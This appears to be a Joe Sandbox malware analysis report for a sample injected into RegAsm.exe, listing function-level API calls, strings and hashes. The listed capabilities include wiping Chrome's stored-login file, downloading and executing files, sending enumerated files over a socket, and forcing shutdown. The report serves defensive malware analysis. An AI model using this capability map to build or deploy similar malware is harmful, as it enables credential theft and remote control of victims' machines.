                                                Yara matches
                                                Similarity
                                                • API ID: AddressCloseCreateLibraryLoadProcsend
                                                • String ID: SHDeleteKeyW$Shlwapi.dll
                                                • API String ID: 2127411465-314212984
                                                • Opcode ID: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                • Instruction ID: 51cedef5a77654bf04fe1bae55708f30d4330cefe0c145b830acf249c6506b6e
                                                • Opcode Fuzzy Hash: 581ded355985a4bc997a0b6be421fb480f1ccbde3fac771bed5e254f0fcd46b0
                                                • Instruction Fuzzy Hash: 16B1F671A0430066CA14FB76DC579AF36A85F91788F40053FB906771E2EE7D8A48C6DA
                                                Function 00449210 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 00449292
                                                • _free.LIBCMT ref: 004492B6
                                                • _free.LIBCMT ref: 0044943D
                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F244), ref: 0044944F
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 004494C7
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 004494F4
                                                • _free.LIBCMT ref: 00449609
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                • String ID:
                                                • API String ID: 314583886-0
                                                • Opcode ID: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                • Instruction ID: 020e1479f4dc59d8c1013f8997fe2690be381d41ecad25fd3e4808fcef6bdafa
                                                • Opcode Fuzzy Hash: 559000fade000ce5825261073cc708c78a0cec13cca3e850b0f4d44e63821d59
                                                • Instruction Fuzzy Hash: E0C13A71900205ABFB24DF79CD41AAF7BA8EF46314F2405AFE884D7291E7788D42D758
                                                Function 004167EF Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 97libraryloadershutdownCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0041798D: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                  • Part of subcall function 0041798D: OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                  • Part of subcall function 0041798D: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                  • Part of subcall function 0041798D: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                  • Part of subcall function 0041798D: GetLastError.KERNEL32 ref: 004179D8
                                                • ExitWindowsEx.USER32(00000000,00000001), ref: 00416891
                                                • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 004168A6
                                                • GetProcAddress.KERNEL32(00000000), ref: 004168AD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                • String ID: !D@$PowrProf.dll$SetSuspendState
                                                • API String ID: 1589313981-2876530381
                                                • Opcode ID: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                • Instruction ID: 272f3f60014ab8f8f2fa2781f50e1ac7d9ab3f628c5d0f86ef79d7992e461550
                                                • Opcode Fuzzy Hash: 8a62792aef7cc7d5af05d35e91714c9c7222b42edbd342514d80bf55c44c9374
                                                • Instruction Fuzzy Hash: D821B17060430166CA14FBB28856ABF36599F41388F41087FB501671D2EF3DD845C76E
                                                Function 0040BA4D Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA89
                                                • GetLastError.KERNEL32 ref: 0040BA93
                                                Strings
                                                • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA54
                                                • [Chrome StoredLogins found, cleared!], xrefs: 0040BAB9
                                                • UserProfile, xrefs: 0040BA59
                                                • [Chrome StoredLogins not found], xrefs: 0040BAAD
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DeleteErrorFileLast
                                                • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                • API String ID: 2018770650-1062637481
                                                • Opcode ID: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                • Instruction ID: 0532e36a1aab116e50a9f1d1704ee325f44086adb43c50cfffb7bf5285f9a594
                                                • Opcode Fuzzy Hash: 2a96545a4d0d9f85ca22cacb1c39f1202692d6e87788dc19eb8fe601ebee372c
                                                • Instruction Fuzzy Hash: 76018F61A402056ACB04B7B6DC5B9BE7724A921704B50057FF806722D2FE7D49098BDE
                                                Function 0041798D Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041799A
                                                • OpenProcessToken.ADVAPI32(00000000), ref: 004179A1
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004179B3
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 004179D2
                                                • GetLastError.KERNEL32 ref: 004179D8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                • String ID: SeShutdownPrivilege
                                                • API String ID: 3534403312-3733053543
                                                • Opcode ID: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                • Instruction ID: 35ac2027e355ce869dd6e937a138cd84cb59798e299a7bc9dfe05b1c572390d3
                                                • Opcode Fuzzy Hash: d49d9c43419eaec1bfbdc5cb8a800583ef6843b46de48ba71f06d4aa9fea9060
                                                • Instruction Fuzzy Hash: 38F03A71802229FBDB10ABA1EC4DAEF7FBCEF05612F100465B909A1152D7348E04CBB5
                                                Function 0040928E Relevance: 9.3, APIs: 6, Instructions: 293fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 00409293
                                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,00DA4958,00000010), ref: 004048E0
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040932F
                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 0040938D
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004093E5
                                                • FindClose.KERNEL32(00000000), ref: 004093FC
                                                  • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E38
                                                  • Part of subcall function 00404E26: SetEvent.KERNEL32(?,?,?,?,00000000,?,004051C0,?,?,?,00405159), ref: 00404E43
                                                  • Part of subcall function 00404E26: CloseHandle.KERNEL32(?), ref: 00404E4C
                                                • FindClose.KERNEL32(00000000), ref: 004095F4
                                                  • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(00000000,00000000,0040547D,?,?,00000004,?,?,00000004,?,00474EF8,?), ref: 00404B47
                                                  • Part of subcall function 00404AA1: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,?,00474EF8,?,?,?,?,?,?,0040547D), ref: 00404B75
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                                                • String ID:
                                                • API String ID: 1824512719-0
                                                • Opcode ID: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                • Instruction ID: 89df7f8b75d3b77417eb58d09b4f39b7dfb13bde992cfd9524fc7595df83f5be
                                                • Opcode Fuzzy Hash: c95fe17c2b037c64b82bab9d1ad7effbaf2979e44fe57e53c64eae2a8e6f4ce2
                                                • Instruction Fuzzy Hash: 34B19D32900109AACB14EBA1DD92AEDB379AF44314F50417FF506B60E2EF785F49CB59
                                                Function 0041AADB Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A731,00000000), ref: 0041AAE4
                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A731,00000000), ref: 0041AAF9
                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB06
                                                • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A731,00000000), ref: 0041AB11
                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB23
                                                • CloseServiceHandle.ADVAPI32(00000000,?,0041A731,00000000), ref: 0041AB26
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Service$CloseHandle$Open$ManagerStart
                                                • String ID:
                                                • API String ID: 276877138-0
                                                • Opcode ID: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                • Instruction ID: 14dbf03deabb1432b93a26d2ddf90514dbbc411f15d31c7908333a88c2a5d316
                                                • Opcode Fuzzy Hash: e30b05f20183ba3613960b636cce26fc80956d1a3587d8fe59d4f8762fcd24c9
                                                • Instruction Fuzzy Hash: FEF0E971141225AFD2115B209C88DFF276CDF85B66B00082AF901921919B68CC45E579
                                                Function 004524BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 00452555
                                                • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,004527DB,?,00000000), ref: 0045257E
                                                • GetACP.KERNEL32(?,?,004527DB,?,00000000), ref: 00452593
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocale
                                                • String ID: ACP$OCP
                                                • API String ID: 2299586839-711371036
                                                • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                                • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                                • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                                Function 0041B539 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                                                Download Yara Rule
                                                APIs
                                                • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000,?,0040F419,00000000), ref: 0041B54A
                                                • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                                • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                                • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Resource$FindLoadLockSizeof
                                                • String ID: SETTINGS
                                                • API String ID: 3473537107-594951305
                                                • Opcode ID: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                • Instruction ID: d04f7a3eece584ab18b37ce022e38df3785cd6d6757b7dd0dc659012c7d5cbc3
                                                • Opcode Fuzzy Hash: a45aaf07b9511fe1cfb91064365b640b81f442c86eb18a115f7d7951e0b61df2
                                                • Instruction Fuzzy Hash: 8EE01A76600B22EBEB211BB1AC4CD863E29F7C97637140075F90586231CB798840DA98
                                                Function 004096A0 Relevance: 7.7, APIs: 5, Instructions: 222fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 004096A5
                                                • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                                • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseFirstH_prologNext
                                                • String ID:
                                                • API String ID: 1157919129-0
                                                • Opcode ID: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                • Instruction ID: 8e52766585a78a9bd0f7e398a9017c7fe376444e683812dd136b20495b515571
                                                • Opcode Fuzzy Hash: 0a4f7936ce2960db9bf45ce6e7c064902b20e644c01fdc90b969e8a4ba3c73a8
                                                • Instruction Fuzzy Hash: 7F814C328001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                                Function 00408847 Relevance: 7.7, APIs: 5, Instructions: 186fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • __EH_prolog.LIBCMT ref: 0040884C
                                                • FindFirstFileW.KERNEL32(00000000,?,00466618,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408905
                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040892D
                                                • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040893A
                                                • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00408A50
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                • String ID:
                                                • API String ID: 1771804793-0
                                                • Opcode ID: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                                • Instruction ID: 0d5560aa06bbfb8d15084ed76e809f646cede1ce68103026aeaac9ba950e1e68
                                                • Opcode Fuzzy Hash: ec9c60c0984909d8cd4645444dd457f9d8bf9c0522e2e7366979e8a6a318d365
                                                • Instruction Fuzzy Hash: 9D517F72900209AACB04FB65DD569ED7778AF10308F50417FB906B71E2EF389B49CB89
                                                Function 00406EEB Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406FF7
                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 004070DB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DownloadExecuteFileShell
                                                • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$open
                                                • API String ID: 2825088817-3056885514
                                                • Opcode ID: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                                • Instruction ID: 89f65c5a2840bfed21b3c91f130df949caec66636536da5e2ea9f2eef63816fc
                                                • Opcode Fuzzy Hash: bb7b935ec16baebde2972a127086196db108f891a0ecdc83552d77310a0d38e2
                                                • Instruction Fuzzy Hash: 5261B371A0830166CA14FB76C8569BE37A59F81758F40093FB9427B2D3EE3C9905C69B
                                                Function 00407877 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                                • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileFind$FirstNextsend
                                                • String ID: XPG$XPG
                                                • API String ID: 4113138495-1962359302
                                                • Opcode ID: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                                                • Instruction ID: fedc3c23448d2be437c2d68ef58725aa3c97e5c0e74d328490a6b39f64eed896
                                                • Opcode Fuzzy Hash: 3d84d9c70616012fa8221750c6a8410ee04de753accb1628ad2af8c264aec63b
                                                • Instruction Fuzzy Hash: 2D21A4315083015BC714FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA098A5B
                                                Function 0041CA73 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                                                Download Yara Rule
                                                APIs
                                                • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                                  • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                                  • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000), ref: 004137E1
                                                  • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?), ref: 004137EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCreateInfoParametersSystemValue
                                                • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                • API String ID: 4127273184-3576401099
                                                • Opcode ID: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                                • Opcode Fuzzy Hash: 47ae7d430718f0ba875629653902a18f4ee72351ea8fb3e3ac61d5bcc2a18165
                                                • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                                Function 0045201B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                • String ID: p'E$JD
                                                • API String ID: 1084509184-908320845
                                                • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                                • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                                • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                                Function 00452143 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                  • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                  • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                                  • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                                • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_400000_RegAsm.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorInfoLastLocale$_free$_abort
                                                • String ID:
                                                • API String ID: 2829624132-0
                                                • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                                • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                                • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                                Function 100060E2 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 100061E4
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 100061F1
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.625103105.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000011.00000002.625097153.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.625103105.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_17_2_10000000_RegAsm.jbxd
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                • String ID:
                                                • API String ID: 3906539128-0
                                                • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                Function 0043BB71 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                                • SetUnhandledExceptionFilter.KERNEL32 ref: 0043BC73
                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                                Memory Dump Source
                                                • Source File: 00000011.00000002.623722246.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000011.00000002.623722246.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                • Associated: 00000011.00000002.623722246.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
